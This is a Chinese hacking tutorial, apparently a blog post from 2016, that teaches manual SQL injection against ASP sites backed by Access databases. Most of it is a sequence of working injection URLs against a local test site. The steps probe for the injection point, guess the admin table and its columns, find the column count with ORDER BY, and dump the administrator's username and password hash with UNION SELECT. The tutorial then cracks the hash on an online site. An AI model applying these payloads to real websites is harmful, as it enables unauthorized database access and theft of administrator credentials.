脚本入侵_ASP使用联合查询语句手工注入方法[夜虫儿]

杨贵妃妃 2016-03-09

展开全文

asp手工注入的教程

我在本地搭建了一个环境，作为调试测试使用

首先，我们要想注入首先要找个注入点，我相信这一点大家都很熟系
http://localhost:1503/shownews.asp?id=52%20and%201=1 返回正确
http://localhost:1503/shownews.asp?id=52%20and%201=2 返回错误

这就可以判断 http://localhost:1503/shownews.asp?id=52 这里存在注入点
我们接下来就要猜解数据库中的管理员所在的表名

http://localhost:1503/shownews.asp?id=52%20and%20exists%20(select%20*%20from%20admin) 这一句的意思就是猜解是否存在admin这个表名

如果存在返回的是正确页面，如果不存在，返回的就是错误页面
我们现在可以看到返回正确，说明的确存在 admin这个表名
下一步我们就要猜解表中的列名
就是把“*”替换成我们要猜解的列名

http://localhost:1503/shownews.asp?id=52%20and%20exists%20(select%20username%20from%20admin) 返回正确页面，表示存在username这个列
http://localhost:1503/shownews.asp?id=52%20and%20exists%20(select%20pass%20from%20admin)   返回错误表示不存在pass这个列

没关系，我们继续猜解
http://localhost:1503/shownews.asp?id=52%20and%20exists%20(select%20password%20from%20admin)   返回正确页面，表示存在password这个列

先说一下吧，username 是用来存放管理员用户名的列
password是用来存放管理员密码的列
现在我们已经猜到了这两个列
那么接下来我们就要猜解管理员的用户名和密码

在这里我使用联合查询语句来猜解

我们先来判断列的长度
等等，换首歌听
不好意思，我们继续开始

http://localhost:1503/shownews.asp?id=52%20order%20by%2010 猜测长度为10   返回正确页面说明长度是大于等于10 的
我们继续把数字增加   呵呵，谁在说我坏话？？？

http://localhost:1503/shownews.asp?id=52%20order%20by%2015   返回错误页面，说明长度在 10到15之间
http://localhost:1503/shownews.asp?id=52%20order%20by%2013 返回错误
说明在10到13 之间
http://localhost:1503/shownews.asp?id=52%20order%20by%2011 返回错误

说明长度是小于11的
刚才我们已经判断了长度是大于等于10的
那么现在我们就可以知道长度就是 10

http://localhost:1503/shownews.asp?id=52%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10%20from%20admin   现在就开是暴管理员的用户名和密码了

对于新手，就好好看看我这句的语法，1，2，3，4，5，6，7，8，9，10表示的是长度
from admin   因为我们前面已经猜出了存在admin这个表名
我们看看页面，发现在页面上爆出了两个字段的位置
2和3
在这里就需要用到我们刚才猜到的列名了
把2替换成username

http://localhost:1503/shownews.asp?id=52%20and%201=2%20union%20select%201,username,3,4,5,6,7,8,9,10%20from%20admin   直接爆出了管理员的名字
这个要比工具猜解快的多

把3替换成 password
http://localhost:1503/shownews.asp?id=52%20and%201=2%20union%20select%201,username,password,4,5,6,7,8,9,10%20from%20admin   直接爆出管理员密码   这也比工具猜解快的多多多多多

好了，我们把这个经过md5加密的密码拿到 www.cdm5.com上去破解吧
破解的明文是：admin888
今天的课程就到此，下面我会教大家 php的手工注入
这个要比asp的强的多

这要是因为asp大多使用的是access数据库
而 php程序一般用的是 mysql数据库

关于这几种数据库的权限，优劣大家课后自己到网上查查吧